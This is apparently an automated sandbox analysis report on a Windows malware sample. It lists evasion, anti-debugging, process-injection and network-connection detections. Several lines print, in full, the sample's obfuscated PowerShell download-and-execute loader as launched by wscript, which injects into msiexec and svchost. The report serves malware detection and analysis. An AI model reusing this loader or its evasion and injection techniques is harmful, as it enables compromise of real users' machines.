                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                        Switches to a custom stack to bypass stack traces
                        Source: C:\Windows\SysWOW64\msiexec.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 4EBB83A
                        Source: C:\Windows\System32\dllhost.exeCode function: GetAdaptersInfo,17_2_00000255E9C12B70
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5872Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4025Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7542Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2243Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 4420Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F0B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,12_3_00007DF45B6F0B80
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B75D66C GetSystemInfo,12_3_00007DF45B75D66C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                        Source: wscript.exe, 00000000.00000002.1674719441.000001F736997000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}W
                        Source: msiexec.exe, 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2022940955.0000000006A2A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2022940955.0000000006A85000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2104760989.0000000002A12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: svchost.exe, 0000000B.00000002.2104802959.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP TCP Service Provider
                        Source: svchost.exe, 0000000B.00000002.2104760989.0000000002A12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                        Source: msiexec.exe, 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: powershell.exe, 00000003.00000002.1836359278.000002247DBBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Hides threads from debuggers
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F2224E LdrInitializeThunk,5_2_04F2224E
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_3_001E0283 mov eax, dword ptr fs:[00000030h]11_3_001E0283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023Jump to behavior
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_7020.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7020, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 255E9C10000 protect: page read and writeJump to behavior
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4160000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory written: C:\Windows\System32\dllhost.exe base: 255E9C10000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF70F3314E0Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (MareschaJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$skonnert='privatest';;$unpresumed='revisionsarbejdes';;$printede='anamniotic';;$erkendtligheden100='petrolic38';;$dybvandet=$host.name;function mareschal($fibrillation){if ($dybvandet) {$jewbush=2} for ($ambiguitet=$jewbush;;$ambiguitet+=3){if(!$fibrillation[$ambiguitet]) { break };$klkning+=$fibrillation[$ambiguitet];$cebian207='motorcades'}$klkning}function dilemmatically($brynskov){ .($underporch) ($brynskov)}$lanciferous211=mareschal 'svnh e tbl..nw';$lanciferous211+=mareschal 'eres bkic lu isyeunnstt';$ballelsseres=mareschal 'plmleop zgli ildel ta u/';$jibbing=mareschal ' wt flsispa1 a2';$underleverancer='me[hjnlee bt b.ovs e,frk v hi dcpse rpcoobeihunintr.m haflnimapag,gemir ,] t:te:prsouel cr,uf,r i etovysupmirfoo nt to jc ,o l b=t $ ijhei mb b bi kns g';$ballelsseres+=mareschal 'fo5in. c0i s(s w nianntadh.o.hwfosdi uana.te .1r,0re.lu0pa;.r dw iunn a6,r4c,;pe lxsi6 u4no;ud bnrm vcr:a 1hi3 1 p.sk0o.)se ,hgree c .kpeog / i2pa0ju1.r0sk0sy1vg0w,1tt ugfcriber bem fekospxti/ep1th3sa1 m. k0';$ambiguitetntrapsychical=mareschal 'ubujos aeunrna-isalig hejen t';$partisk=mareschal 'orhsptnot rp.nsun: ./tr/.pwvawhywsp.b paftfrs.a.ungheremo u cps,/.damebg /k iv nphfovapunf.tphrtiyglm eeudn b.ocd,pemep ulo.o .y a>alhspts t op.fsac: r/k,/bawciwskwsu.lupsku en se testt ,.c abeeup/d ad,bko/m iranfaf uason bt .runy msue ,n f.hads.eanpr lokosvy';$hovedets=mareschal 't,>';$underporch=mareschal 'n i se kx';$kuldioxidets='strateg';$debatsidens='\quaiches.arg';dilemmatically (mareschal 'b $p glel.poneb aa blsk:hoa eudrssa t desm=u $,aep ncavr :raa pfrptadbea ut uace+sk$ .d hefab adettos,ri,kdsieinnbis');dilemmatically (mareschal 'ge$.eg lafo .bknaawlry:s c ,hpaaafp rln.efuss sjo= ,$r pc ad re tu.iagspek . os epfol oipatde( o$reh aofovinelsd e,ft hstr)');dilemmatically (mareschal $underleverancer);$partisk=$chapless[0];$bibbed=(mareschal ' s$ egfoltmoudbadaunl o: ,pmyi.icd tpru frboifezinacot ciwaorena,s h=lenkle .w a-ovo tbspjshe.vc,utni ryssoys s ptude ,m o.n $anl,aaannfecdiic,f eetir nosmusus e2 o1 g1');dilemmatically ($bibbed);dilemmatically (mareschal ' t$o,p ,iruc,itmuul rabis z ia.etg.ihoo n s .alh.ee lahedsae ,rnosu [v $poa pmovb wit.g ugrikotruesht.knv,tkorp adapt sspy ic.dhfii fcjuainl g]m.=r $unb latilfolkneunlsusf sm.e prpiegas');$instrumenter=mareschal ' h$snp istclet euc.rfuir z baint di ao inlss c.,rds olywsvnu l .oaba ydtafu.iabld,e ( i$plpmya brantrai gs ,kj ,ro$refa,o,er ,nprjflemidgeeinssy)';$fornjedes=$aerate;dilemmatically (mareschal 'fr$brglalpeofrbuna ,l ,: rvl.i rspu ts iss egln ts,u=fr(idt ,e tsbetbo-pepana .tdoh f w$gofpioafrbln jb e dkoebrsen)');while (!$virussens) {dilemmatically (mareschal 'ov$ ngetl co obs,abal b: uafinmaa lgmir dab mfem aafrtadi sprefo= $ ianimslbalic g kuh i ftv eprtbanmudbrsgekr yt.d efll rssue 2,o3 f6') ;dilemmatically $instrumenter;dilemmatically (marescha
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$skonnert='privatest';;$unpresumed='revisionsarbejdes';;$printede='anamniotic';;$erkendtligheden100='petrolic38';;$dybvandet=$host.name;function mareschal($fibrillation){if ($dybvandet) {$jewbush=2} for ($ambiguitet=$jewbush;;$ambiguitet+=3){if(!$fibrillation[$ambiguitet]) { break };$klkning+=$fibrillation[$ambiguitet];$cebian207='motorcades'}$klkning}function dilemmatically($brynskov){ .($underporch) ($brynskov)}$lanciferous211=mareschal 'svnh e tbl..nw';$lanciferous211+=mareschal 'eres bkic lu isyeunnstt';$ballelsseres=mareschal 'plmleop zgli ildel ta u/';$jibbing=mareschal ' wt flsispa1 a2';$underleverancer='me[hjnlee bt b.ovs e,frk v hi dcpse rpcoobeihunintr.m haflnimapag,gemir ,] t:te:prsouel cr,uf,r i etovysupmirfoo nt to jc ,o l b=t $ ijhei mb b bi kns g';$ballelsseres+=mareschal 'fo5in. c0i s(s w nianntadh.o.hwfosdi uana.te .1r,0re.lu0pa;.r dw iunn a6,r4c,;pe lxsi6 u4no;ud bnrm vcr:a 1hi3 1 p.sk0o.)se ,hgree c .kpeog / i2pa0ju1.r0sk0sy1vg0w,1tt ugfcriber bem fekospxti/ep1th3sa1 m. k0';$ambiguitetntrapsychical=mareschal 'ubujos aeunrna-isalig hejen t';$partisk=mareschal 'orhsptnot rp.nsun: ./tr/.pwvawhywsp.b paftfrs.a.ungheremo u cps,/.damebg /k iv nphfovapunf.tphrtiyglm eeudn b.ocd,pemep ulo.o .y a>alhspts t op.fsac: r/k,/bawciwskwsu.lupsku en se testt ,.c abeeup/d ad,bko/m iranfaf uason bt .runy msue ,n f.hads.eanpr lokosvy';$hovedets=mareschal 't,>';$underporch=mareschal 'n i se kx';$kuldioxidets='strateg';$debatsidens='\quaiches.arg';dilemmatically (mareschal 'b $p glel.poneb aa blsk:hoa eudrssa t desm=u $,aep ncavr :raa pfrptadbea ut uace+sk$ .d hefab adettos,ri,kdsieinnbis');dilemmatically (mareschal 'ge$.eg lafo .bknaawlry:s c ,hpaaafp rln.efuss sjo= ,$r pc ad re tu.iagspek . os epfol oipatde( o$reh aofovinelsd e,ft hstr)');dilemmatically (mareschal $underleverancer);$partisk=$chapless[0];$bibbed=(mareschal ' s$ egfoltmoudbadaunl o: ,pmyi.icd tpru frboifezinacot ciwaorena,s h=lenkle .w a-ovo tbspjshe.vc,utni ryssoys s ptude ,m o.n $anl,aaannfecdiic,f eetir nosmusus e2 o1 g1');dilemmatically ($bibbed);dilemmatically (mareschal ' t$o,p ,iruc,itmuul rabis z ia.etg.ihoo n s .alh.ee lahedsae ,rnosu [v $poa pmovb wit.g ugrikotruesht.knv,tkorp adapt sspy ic.dhfii fcjuainl g]m.=r $unb latilfolkneunlsusf sm.e prpiegas');$instrumenter=mareschal ' h$snp istclet euc.rfuir z baint di ao inlss c.,rds olywsvnu l .oaba ydtafu.iabld,e ( i$plpmya brantrai gs ,kj ,ro$refa,o,er ,nprjflemidgeeinssy)';$fornjedes=$aerate;dilemmatically (mareschal 'fr$brglalpeofrbuna ,l ,: rvl.i rspu ts iss egln ts,u=fr(idt ,e tsbetbo-pepana .tdoh f w$gofpioafrbln jb e dkoebrsen)');while (!$virussens) {dilemmatically (mareschal 'ov$ ngetl co obs,abal b: uafinmaa lgmir dab mfem aafrtadi sprefo= $ ianimslbalic g kuh i ftv eprtbanmudbrsgekr yt.d efll rssue 2,o3 f6') ;dilemmatically $instrumenter;dilemmatically (marescha
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$skonnert='privatest';;$unpresumed='revisionsarbejdes';;$printede='anamniotic';;$erkendtligheden100='petrolic38';;$dybvandet=$host.name;function mareschal($fibrillation){if ($dybvandet) {$jewbush=2} for ($ambiguitet=$jewbush;;$ambiguitet+=3){if(!$fibrillation[$ambiguitet]) { break };$klkning+=$fibrillation[$ambiguitet];$cebian207='motorcades'}$klkning}function dilemmatically($brynskov){ .($underporch) ($brynskov)}$lanciferous211=mareschal 'svnh e tbl..nw';$lanciferous211+=mareschal 'eres bkic lu isyeunnstt';$ballelsseres=mareschal 'plmleop zgli ildel ta u/';$jibbing=mareschal ' wt flsispa1 a2';$underleverancer='me[hjnlee bt b.ovs e,frk v hi dcpse rpcoobeihunintr.m haflnimapag,gemir ,] t:te:prsouel cr,uf,r i etovysupmirfoo nt to jc ,o l b=t $ ijhei mb b bi kns g';$ballelsseres+=mareschal 'fo5in. c0i s(s w nianntadh.o.hwfosdi uana.te .1r,0re.lu0pa;.r dw iunn a6,r4c,;pe lxsi6 u4no;ud bnrm vcr:a 1hi3 1 p.sk0o.)se ,hgree c .kpeog / i2pa0ju1.r0sk0sy1vg0w,1tt ugfcriber bem fekospxti/ep1th3sa1 m. k0';$ambiguitetntrapsychical=mareschal 'ubujos aeunrna-isalig hejen t';$partisk=mareschal 'orhsptnot rp.nsun: ./tr/.pwvawhywsp.b paftfrs.a.ungheremo u cps,/.damebg /k iv nphfovapunf.tphrtiyglm eeudn b.ocd,pemep ulo.o .y a>alhspts t op.fsac: r/k,/bawciwskwsu.lupsku en se testt ,.c abeeup/d ad,bko/m iranfaf uason bt .runy msue ,n f.hads.eanpr lokosvy';$hovedets=mareschal 't,>';$underporch=mareschal 'n i se kx';$kuldioxidets='strateg';$debatsidens='\quaiches.arg';dilemmatically (mareschal 'b $p glel.poneb aa blsk:hoa eudrssa t desm=u $,aep ncavr :raa pfrptadbea ut uace+sk$ .d hefab adettos,ri,kdsieinnbis');dilemmatically (mareschal 'ge$.eg lafo .bknaawlry:s c ,hpaaafp rln.efuss sjo= ,$r pc ad re tu.iagspek . os epfol oipatde( o$reh aofovinelsd e,ft hstr)');dilemmatically (mareschal $underleverancer);$partisk=$chapless[0];$bibbed=(mareschal ' s$ egfoltmoudbadaunl o: ,pmyi.icd tpru frboifezinacot ciwaorena,s h=lenkle .w a-ovo tbspjshe.vc,utni ryssoys s ptude ,m o.n $anl,aaannfecdiic,f eetir nosmusus e2 o1 g1');dilemmatically ($bibbed);dilemmatically (mareschal ' t$o,p ,iruc,itmuul rabis z ia.etg.ihoo n s .alh.ee lahedsae ,rnosu [v $poa pmovb wit.g ugrikotruesht.knv,tkorp adapt sspy ic.dhfii fcjuainl g]m.=r $unb latilfolkneunlsusf sm.e prpiegas');$instrumenter=mareschal ' h$snp istclet euc.rfuir z baint di ao inlss c.,rds olywsvnu l .oaba ydtafu.iabld,e ( i$plpmya brantrai gs ,kj ,ro$refa,o,er ,nprjflemidgeeinssy)';$fornjedes=$aerate;dilemmatically (mareschal 'fr$brglalpeofrbuna ,l ,: rvl.i rspu ts iss egln ts,u=fr(idt ,e tsbetbo-pepana .tdoh f w$gofpioafrbln jb e dkoebrsen)');while (!$virussens) {dilemmatically (mareschal 'ov$ ngetl co obs,abal b: uafinmaa lgmir dab mfem aafrtadi sprefo= $ ianimslbalic g kuh i ftv eprtbanmudbrsgekr yt.d efll rssue 2,o3 f6') ;dilemmatically $instrumenter;dilemmatically (mareschaJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
